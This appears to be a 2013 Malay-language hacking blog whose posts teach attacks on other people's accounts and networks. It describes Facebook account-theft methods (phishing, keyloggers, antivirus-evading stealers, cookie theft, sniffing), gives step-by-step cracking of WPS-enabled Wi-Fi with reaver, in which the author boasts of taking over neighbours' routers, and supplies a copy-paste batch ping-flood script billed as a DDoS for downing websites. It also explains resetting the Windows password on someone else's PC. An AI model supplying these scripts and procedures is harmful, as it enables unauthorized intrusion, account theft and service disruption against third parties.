scrolling text

Selamat datang ke blog HackingSoftware41. Selamat membaca. Jangan lupa lawati www.jomgegar.com jumpa anda disana

ads

loading...

Friday, July 26, 2013

[inFo] 09 Kaedah yang digunakan oleh hackers untuk hack Facebook / 09 Method in facebook hacking by hackers

JANGAN DISALAHGUNAKAN, KAMI TIDAK AKAN BERTANGGUNGJAWAB DI ATAS SESUATU YANG BERLAKU, SEKADAR UNTUK BERKONGSI SAHAJA

Assalamualaikum kawan-kawanku sekalian, hye lama tak jumpa kan? haha berdasarkan analisis yang aku buat sebelum ni, aku dapati ramai yang berminat dalam kegiatan hack facebook. Banyak kaedah-kaedah yang membolehkan kita hack facebook. Tapi ingat, bukan senang nak hack facebook. Bukan sekadar klik je. Untuk hack facebook korang kena ada :-

                                                     1- Kaedah yang berkesan (banyak)
                                                     2- Kesabaran
                                                     3- Sedikit pemikiran yang pintar dan putar belit
                                                     4- Berjaga malam sambil dengar lagu Headbanging macam aku.



Pelbagai kaedah yang boleh kita gunakan untuk hack facebook ni k. Aku akan bgtau sikit-sikit la yang aku tau tentang hack facebook ni. Aku pon tak berapa pandai dalam hacking ni, aku pon noob lagi dalam dunia siber ni. Masih perlu bantuan orang lain untuk belajar, yang pastinya pakcik Google adalah cikgu yang tak pernah mengalah mengajar muridnya. :- 

09 Kaedah yang membolehkan hackers merampas akaun facebook adalah seperti yang kat bawah ni.Lets Go

1. Phishing / Laman facebook palsu
Kaedah pishing ni dah lama popular beberapa tahun sebelum ni, malah ramai manusia sejagat sudah tahu trick yang digunakan dalam facebook pishing ni. Hackers akan membuat laman Log In facebook palsu dan akan mengirimnya kepada mangsa berdasarkan beberapa kaedah tipu muslihat yang agak cerdik, kesannya mangsa akan tertipu dan akan klik link yang mangsa dapat dari hackers. Apabila mangsa dah klik dan log in menggunakan link yang hackers kasi tu, maka segala username dan password akan disimpan didalam php yang terkandung dalam laman palsu tu, seterusnya hackers akan memuat turun dan terus akses facebook mangsa. Hackers akan mengemaskini (update status) mangsa sesuka hati.


2. Keylogging / log kekunci
Keylogger yang terdapat dalam pasaran hot sekarang adalah berperanan untuk menyimpan segala log yang terdapat dalam komputer atau pc atau laptop seseorang mangsa. Bagaimana mangsa boleh terkena keylogging ni? haha caranya mudah sahaja, situasi nya sama juga seperti pishing method. Hackers akan menghantar link yang mengandungi keylogger tanpa mangsa sedari. Kebanyakan link-link ni digenerate oleh spammer dan banyak lagi, yang penting link tersebut akan mangsa klik. Apabila sesebuah pc ni dah terkena keylogging, segala key akan dihantar kepada hackers. Seterusnya hackers akan mengakses segala akaun yang terdapat dalam log.txt yang dihantar ke hackers. Macam gambar kat bawah ni.


3. Stealer
Stealer seperti iStealer pula berperanan mencuri kata laluan dan id yang terkandung dalam pelayar-pelayar yang terdapat dalam sesebuah laptop atau pc. Stealer akan simpan segala id dan kata laluan yang terdapat dalam pelayar tanpa mengira apa jenis akaun termasuklah maybank2u, facebook, gmail, yahoo dan etc. Hackers akan menjadikan Stealer ni dalam keadaan FUD( Full Un-Detect) untuk memudahkan ianiya dapat bypass anti-virus dengan mudah. Tak kira apa jenis anti-virus yang dipakai oleh laptop mangsa.



4. Cookies
Kebanyakan manusia sejagat tidak mengambil endah cookies yang terdapat dalam laptop masing-masing. Cookies amatlah berguna kepada hackers atau manusia yang bermatlamat hitam untuk merampas akaun anda. Hackers akan menggunakan cookies ini sebagai tool. Kebanyakan ianya active dalam LAN (Local Area Network) Cookies yang telah digunakan oleh mangsa akan disimpam re-use oleh hackers untuk mengesahkan hackers tersebut adalah pemilik akaun tersebut. 



5. Sidejacking dengan firesheep
Firesheep digunakan secara meluas untuk melancarkan serangan menggunakan sidejacking. Ianya hanya berfungsi apabila kedua-dua hackers dan mangsa berada dalam satu network wifi. Ianya melibatkan http:// (kurang pengetahuan dalam isu ini, maaf)



6- Godam facebook melalui handphone
Sekarang ni kebanyakan manusia sejagat mempunyai akses facebook menggunakan handphone. Hackers akan menggunakan beberapa jenis software untuk mendapatkan akses facebook mangsa melalui handphone.
Antara tool yang digunankan dalam kaedah ini adalah seperti mobile spy.



7- Sniffing
Kaedah sniffing adalah kaedah yang paling best jika kita berjaya dalam sniffing. Aku ada pengalaman sikit dalam sniffing ni. Manis rasanya kejayaan itu. haha Sniffing ni berlaku dalam satu rangkaian network dimana hackers akan berada dalam network mangsa dan akan sniff aktiviti yang berlaku dalam rangkaian mangsa. Apa yang mangsa browse akan dapat dikesan oleh hackers. Berhati-hati dalam network wifi anda!!!


8-Usb Stealer
Kaedah ini pada pendapat aku mungkin berlaku pada teman-teman rapat kita. Hackers hanya perlu memasukkan usb stealer pada laptop anda dan seterusnya dia akan klik satu application sahaja. Semua id dan kata laluan yang terdapat dalam pc anda akan disedut


9-Man in the Middle 
Dalam kaedah Man in the Middle ni, hackers akan berada dalam satu rangkaian network dimana hackers akan menempatkan dirinya dalam network tersebut sebagai orang tengah. Segala traffic lalu-lalang akan melalui MiTM ni, maka secara automatiklah hackers akan tahu segala activity yang berlaku dalam network tersebut. Kaedah ini dijalankan dalam network yang berasaskan suis dalam satu rangkaian yang sama.


Thank You for Read

Perhatian : Menyalin atau mengeluarkan semula artikel ini adalah dilarang sama sekali dan akan mengakibatkan sesuatu yang buruk berlaku pada sesiapa yang terlibat.












Wednesday, July 24, 2013

[Tut] Bagaimana nak buat Bootable operating sistem dalam USB / How to create a Bootable Operating system using USB for xiaopan and etc.


Assalamualaikum kawan-kawanku sekalian, pada entry aku kali ni aku nak kongsikan dengan korang cara-cara bagaimana nak masukkan operating sistem seperti beini, backtrack dan xiaopan ka dalam usb. Dengan adanya OS didalam USB korang maka senang la sikit kerja-kerja kita untuk crack password wifi dan sebagainya. 

a) Korang pada mula sekali kena ada osftware ni > unetbootin > klik sini untuk download > http://ge.tt/3Mt0ajm/v/0?c

b) Yang kedua pula korang kena ada USB thumb drive 4GB. Make sure it is 4GB. 

c) Format semula thumb drive korang tu k. (default)


d) Selepas itu, kenalpasti location untuk iso yang korang nak masukkan dalam usb korang tu. Seterusnya korang RUN unetbootin yang korang download tadi k.


e) Korang tick pada Diskimage dan lorang letakkan location dimana iso korang. Selepas itu korang hanya click ok dan tunggu sehingga process selesai.


f) Korang akan nampak paparan gambar seperti diatas apabila iso korang selesai dan berjaya berada dalam usb korang. Korang seterusnya bolehlah restart your PC. Untuk pastikan isnya Running, make sure korang kena setting usb drive as your first boot.



Saturday, July 13, 2013

[Picture Tutorial] How to crack WPA encyption key + WPS enable / Cara-cara nak crack password wifi WPA yang mengaktifkan WPS

JANGAN DISALAHGUNAKAN, KAMI TIDAK AKAN BERTANGGUNGJAWAB DIATAS SESUATU YANG BERLAKU, SEKADAR UNTUK BERKONGSI SAHAJA.




Salam kawan-kawan ku yang aku kasihi sekalian, sihat ke? Macam mana dengan puasa korang? Ada miss ke? Jangan tak puasa pulak ye! Hari ni dah masuk hari yang keberapa ye? Hari ni aku niaga kat bazaar Ramadhan kat Keramat Mall. Korang pergilah jengah gerai-gerai kami kat sana k. Macam-macam ada tau. Datang jangan tak datang plak.hehe promote2. Sebelum aku gi niaga ni aku nak update blog aku jap.Berjumpa lagi kita pada entry kali ni ye. Hari ni aku nak kongsikan dengan korang tentang cara-cara nak crack password wifi yang menggunakan encyption WPA dan router tu mengaktifkan WPS. Sebelum tu korang kena tahu apa itu WPS? Kalau tak tau korang baca petikan blog yang ada dalam gambar kat bawah ni k. 




Kalau korang masih ragu-ragu korang follow link ni > http://www.myopenrouter.com/article/10185/What-is-Wi-Fi-Protected-Setup---WPS-/ kat sini dia terangkan tentang WPS yang aku maksudkan tu. Okey, aku pun tak nak bersembang panjang-panjang, korang pon mesti meluat kalau aku nyembang lama-lama kan? betul tak? ikut korang la nak meluat ka apa ka.. hahahhaha aku nak kongsi jer... ok let's go below>

1-  Korang mula-mula kena ada CD cracking yang namanya Beini atau Xiaopan.. Version apa pon tak kisah tapi function sama saja k. Korang kalau dah ada CD tu korang hanya perlu follow je gambar yang akan ku upload jap lagi k. 

2- Intro ni korang baca la dulu k



2- Sebelum masukkan CD Beini tu, korang kena Set up Pc korang dulu, korang kena jadikan CD-Rom sebagai first Boot dan masukkan CD Beini tu, seterusnya korang "save" dan "quit".
Selepas CD tu running, dia akan prompt window yang macam gambar kat bawah ni



 3- Selepas itu, korang klik pada simbol titisan air tu, seperti dalam gambar diatas k. Korang nampak tak? 3 dari kanan dalam gambar kat atas ni, atau korang cer tengok 'hackingsoftware41.blogspot.com' ia sama kedudukan dengan huruf   "blo"gspot... Selepas korang klik kat simbol tu ia akan kuar plak window yang macam dalam gambar kat bawah ni.




4- Korang tak anak panah dalam gambar kat atas tu? korang follow je yang dia tunjuk tu k. Untuk WLAN adapter selection, korang kena pastikan korang select pada antenna wifi korang, kalau korang pakai signalking atau alfa, make sure korang select pada WLAN yang adapternya nama Realtek 8187. Selepas itu, korang anak panah yang no.3 ke bawah. Kat situ dia suruh korang pilih jenis encryption yang korang nak crack. kalau korang nak crack WPA, maka korang select kat WPA lah ye.Selepas itu korang klik kat 'scan'. Tunggu sehingga dia habis 'scanning' wifi berdekatan dengan kawasan berdekatan dengan korang.



5- Selepas selesai 'scan', maka korang boleh lah pilih wifi mana yang korang nak attack tu k. Make sure korang kena pastikan Wifi yang korang nak attack tu ada tertulis 'wps' kat hujungnya. Kalau tak ada, maka korang tak akan berjaya crack wifi tu. Selepas dah pilih, korang klik pada button 'reaver' dan tunggu. Then, klik 'ok' seperti dalam gambar




6-  Selepas korang hanya kena tunggu je la sampai lah wifi yang korang pilih tu cracked.



7- Gambar yang kat atas ni tengah 'run' k.. tunggu je



8- Kalau kuar window pop-up macam dalam gambar yang kat atas ni bermakna korang berjaya lah ok.. Yang penting sekali korang kena sabar k. haha biasa lah nak yang free kan? so banyakkan bersabar. 






9- Korang cer tengok gambar kat atas ni, haha ada 5 wifi kan? semua BSSID aku buat sendiri tu, hasil dari kerja2 cracking password.. masa ni WEP is famous, ramai orang guna dulu sebelum WPA. hahaha ni la jadinya. Aku crack pastu aku masuk dalam router dorang, pastu aku buat password aku sendiri. Jangan Tiru plak k.. Ni citer dulu2 je k. Aku pon dah lambat  ni nak gi niaga plak, cari duit sikit nak tambah pendapatan bulan puasa ni.. hehe 

"Selamat Mencuba"


 

Tuesday, July 9, 2013

[TUT] How to make a DDOS attack by using a notepad / buat serangan DDOS menggunakan notepad



JANGAN DISALAHGUNAKAN, KAMI TIDAK AKAN BERTANGGUNGJAWAB DI ATAS SESUATU YANG BERLAKU, SEKADAR UNTUK BERKONGSI SAHAJA

Assalamualaikum kawan-kawan ku sekalian, moga korang sihat sejahtera hendaknya. Bertemu lagi pada entry ketiga pada hari yang sama dalam tajuk " Membuat serangan DDOS menggunakan notepad / How to make a DDOS attack using a notepad". InsyaAllah dengan keizinan-NYA aku akan kongsikan dengan korang sekalian ilmu yang aku dapat dari blogger jugak. Dengan cara ini  memudahkan aku untuk revision subject yang lepas yang telah lama aku tinggalkan. DDOS atau Distributed Denial Of Servise adalah serangan terhadap website-website yang kita mahukan ianya down.

1. Buka Notepad anda

2. Next, copy text ini dalam notepad korang k.

@echo off
mode 67,16
title DDOS Attack
color 05
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS Bayu Ae
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attack Server %m%
ping %m% -i %n% -t >nul
goto DDOS


3. Kemudian save as batch file. example: ddos.bat

4. ping target anda dan dapatkan ip target tersebut.

5. Masukkan ip tersebut pada ip Host dan masukkan juga packet size "50000" atau aother yang korang nak hantar tu.
Seterusnya, klik enter dan saksikan. Kaedah ini jika menggunakan bilangan pc yang banyak maka percent untuk berjaya akan tinggi untuk server itu DOWN. Bergantung berapa lama masa yang korang ambik untuk DDOS website target.



[TuT] Reset Password windows 7 using Trinity Rescue Kit 3.4 / set semula password win 7 menggunakan Trinity Rescue Kit 3.4



Assalamualaikum kawan-kawan, bertemu lagi kita pada entry kedua pada hari yang sama dalam tajuk " How to reset password windows 7 using Trinity Rescue Kit " . Kali ini aku nak kongsikan dengan korang cara-cara bagaimana kita nak reset password windows 7 menggunakan .iso yang kita perlu download. Idea ni pun aku copy dari group community aku dan aku kongsikan kat sini semoga bermanfaat pada korang semua.

1. Okey mula-mula korang kene download Trinity Rescue Kit ni
    Korang follow link ni untuk download http://trinityhome.org/Home/index.php?wpid=116&front_id=12

2. Selepas korang dah siap download .iso tadi korang dikehendaki burn .iso tersebut dalam dvd atau usb korang. usb 4GB dan keatas sahaja k. Ada beberapa cara untuk korang burn kan .iso tadi dalam dvd dan usb. Untuk usb korang boleh menggunakan unetbootin dan untuk dvd korang leh gunakan Laptop korang sendiri atau follow link ni http://www.imgburn.com/.

3. Selepas itu korang kena dapatkan username untuk pemilik laptop atau pc yang korang nak recover password tu.



4. Dalam gambar diatas, Administrator adalah username pc tersebut. Username ini yang akan korang gunakan untuk log in dalam PC tersebut.

5. Selepas korang dah siap burn .iso tadi dalam dvd atau usb, korang masukkan dvd tersebut dalam dvd-tray. Bagi pengguna usb korang masukkan pada port usb tu dan seterusnya korang restart pc dan boot Trinity Recue Kit as first boot. Dan press enter.

6. Apabila dah prompt Trinity Rescue Kit (TRK) korang pilih line yang pertama. Run Trinity Rescue Kit 3.4. Selepas itu korang highlight pada windows password Resetting.

7.  Seterusnya korang highlight pulak pada "winpass with prompt for username first". Pastu korang taip nama username tadi pada : Username to Reser Password of :

8. Seterusnya korang taip number 1 pada => Make your choice or q to quite [1]:

9. Seterusnya korang taip 1 untuk clear user password.

10.  Seterusnya korang quite this menu dan taip reboot. Pc akan automatik reboot dan setting semula first anda kepada default.
                                                                                

                                 "Selamat Mencuba dan Selamat menjalani ibadah puasa"

[TUT] Bagaimana nak jadikan wifi anda tidak kelihatan / How to Make Your Wireless Network Invisible



Assalamualaikum kawan-kawan yang aku kasihi sekalian, semoga pertemuan kita kali ini dalam entri yang bertajuk " Bagaimana nak jadikan Wifi anda tidak kelihatan" mendapat keredhaan dari Allah swt. Lama aku tak update blog aku ni sebab aku balik kampung da ade keje sikit. Sekarang aku nak berkongsi satu perkara baru dengan korang, aku terfikir plak nak kongsi tajuk ni sewaktu aku dalam bus nak on the way balik kampung, aku dapat ilham dari dalam bus tu. hahaha. Okey sekarang aku akan cerita sikit tentang Wifi ni.Rangkaian tanpa wayar (wifi korang) mempunyai nama unik yang dikenali sebagai SSID, kebanyakan router akan menyiarkan wifinya tersendiri, sekali gus membolehkan 'hackers atau crackers' untuk mengakses rangkaian korang. Artikel ini akan menunjukkan kepada korang bagaimana cara untuk menyembunyikan wifi korang ni.
Aku cadangkan supaya korang membuat nota SSID rangkaian anda sebelum melakukan ini. Kalau tak nanti korang akan pening sikit nak buat benda ni.

1. Korang log in dalam router korang pastu korang buka 'front panel' korang (rujuk manual jika tidak pasti).

2. Korang pilih "Rangkaian Home" daripada menu. (Nama terpulang pada router masing-masing).

3. Pilih 'WLAN' atau pilihan yang sama dan klik pada 'configure' atau makna lain yang seerti dengan nya.

4. Hilangkan tanda 'siaran rangkaian nama' atau dalam bahasa inggeris 'Broadcast Network Name'.

5. Pastu korang klik "Apply" atau "Save"

Pastu Log out.



Maka siaplah keja korang. Selamat mencuba kawan-kawan